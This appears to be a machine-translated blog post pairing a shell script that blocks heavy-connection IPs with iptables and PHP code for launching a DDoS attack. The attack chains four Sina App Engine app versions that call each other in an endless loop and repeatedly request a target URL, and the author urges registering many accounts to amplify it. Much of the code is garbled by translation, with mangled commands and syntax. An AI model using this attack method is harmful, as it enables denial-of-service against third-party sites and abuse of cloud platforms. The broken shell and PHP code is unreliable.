Summary of server DDOS Attack Defense script

The server collects two types of script code for ddos attacks. One is the linux shell Command, and the other is the support for php code in any environment. I will post the source code below, for more information, see.

SHELL scripts for server defense against DDOS attacks

1. write scripts

Mkdir/root/bin

Vi/root/bin/dropip. sh

#! /Bin/bash

/Bin/netstat-na | grep ESTABLISHED | awk '{print $5}' | awk-F: '{print $1}' | sort | uniq-c | sort-rn | head-10 | grep-v-E '192. 168 | 127.0 '| awk' {if ($2! = Null & $1> 4) {print $2} '>/tmp/dropip

For I in $ (cat/tmp/dropip)

Do

/Sbin/iptables-a input-s $ I-j DROP

Echo "$ I kill at 'date'">/var/log/ddos

Done

2. Add execution permission

Chmod + x/root/bin/dropip. sh

3. Added to the scheduled task and executed every minute

Crontab-e

*/1 */root/bin/dropip. sh

Note:

The most important is that in the second row, the first 10 ip addresses with the maximum number of ESTABLISHED connections are obtained and written to the temporary file/tmp/dropip, excluding the internal ip segment starting with 192.168 | 127.0. use the for loop to drop all the ip addresses in the dropip through iptables, and then write them to the log file/var/log/ddos.

Another method is to use php to write ddos attacks and use other cloud platforms for operations.

Sinaapp is used as the test object.

Test method: create four versions of the app.

The homepage code of version 1 is as follows:

<Php

File_get_contents ('HTTP: // 2.mars.sinaapp.com/'); // version 1 triggers an attack (Access Version 2)

>

Version 2 homepage code:

<Php

File_get_contents ('HTTP: // www.xxx.com/ip.php'): // target

File_get_contents ('HTTP: // 3.mars.sinaapp.com/'); // Access Version 3

>

Version 3 homepage code:

<Php

For ($ I = 1; $ <= 10; $ I ++) {// here it's a bit evil, and more than a few times it's better

File_get_contents ('HTTP: // www.xxx.com/ip.php ');

File_get_contents ('HTTP: // 4.mars.sinaapp.com /');}

>

Version 4 homepage code:

<Php

File_get_contents ('HTTP: // 2.mars.sinaapp.com/'); // Access Version 2, leading to an endless loop

>

The above is an attack using a sinaapp user. You can expand it by yourself, register a large number of users, and create more versions to launch attacks. However, during the test, we found that each APP actually has two IP addresses. It is better to use multiple users.